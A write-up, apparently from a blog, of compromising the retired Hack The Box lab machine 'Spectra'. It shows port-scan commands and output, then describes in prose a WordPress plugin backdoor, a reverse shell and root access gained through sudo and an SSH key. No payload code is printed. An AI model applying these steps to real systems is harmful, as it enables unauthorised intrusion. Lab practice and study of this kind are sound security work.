On this post
- Information Gathering
- Privilege Escalation
Spectra is a retired vulnerable VM from Hack The Box.
Let’s start with a
masscan probe to establish the open ports in the host.
masscan -e tun0 -p1-65535 10.10.10.229 --rate=1000 Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2021-02-28 10:05:49 GMT Initiating SYN Stealth Scan Scanning 1 hosts [65535 ports/host] Discovered open port 22/tcp on 10.10.10.229 Discovered open port 80/tcp on 10.10.10.229 Discovered open port 3306/tcp on 10.10.10.229
Hmm, nothing interesting. Let’s do one better with
nmap scanning the discovered ports to establish their services.
nmap -n -v -Pn -p22,80,3306,8081 -A --reason 10.10.10.229 -oN nmap.txt ... PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 8.1 (protocol 2.0) | ssh-hostkey: |_ 4096 52:47:de:5c:37:4f:29:0e:8e:1d:88:6e:f9:23:4d:5a (RSA) 80/tcp open http syn-ack ttl 63 nginx 1.17.4 | http-methods: |_ Supported Methods: GET HEAD |_http-server-header: nginx/1.17.4 |_http-title: Site doesn't have a title (text/html). 3306/tcp open mysql syn-ack ttl 63 MySQL (unauthorized) |_ssl-cert: ERROR: Script execution failed (use -d to debug) |_ssl-date: ERROR: Script execution failed (use -d to debug) |_sslv2: ERROR: Script execution failed (use -d to debug) |_tls-alpn: ERROR: Script execution failed (use -d to debug) |_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
This is what the
http service looks like.
I’d better map
/etc/hosts. This is how each of them look like.
If you navigate to
/testing, you’ll notice that directory indexing is turned on.
One of the files contain the password for what seem like the WordPress database.
Maybe this is
administrator’s password to the working WordPress?
Once an attacker has
administrator access to your WordPress installation, you are pretty much pwned. Here’s I’m creating another user with the Administrator role.
This plugin comes pre-installed in every WordPress installation and even though it’s pretty much a useless plugin, it’s extremely useful to us in getting that prized foothold to the remote machine.
You’ll noticed that the Hello Dolly plugin is not activated but that’s good because we can edit the plugin to include some backdoor PHP code and then activate the plugin.
There’s only one file in the Hello Dolly plugin and that’s
hello.php. Let’s include our backdoor PHP code like so.
Update the file and then activate the plugin. Insert the
0 parameter at the address bar and instant remote command execution.
With that, we can run a reverse shell back to us with a Perl one-liner.
There you have it.
During enumeration of
nginx’s account, I notice the presence of another account:
user.txt is in
katie’s home directory.
Thank goodness for the “hint” left in
/opt/autologin.conf.orig by the creator, otherwise I wouldn’t have found
katie’s password in
From this, we also come to learn that this mysterious Other OS is the Chrome OS. Without further ado, I present to you
And here’s the
During enumeration of
katie’s account, I notice that
katie is able to
sudo the following.
developers group, which
katie is a member of, created a whole bunch of
test1.conf to insert a SSH public key I control to
/root/.ssh/authorized_keys and call it a day.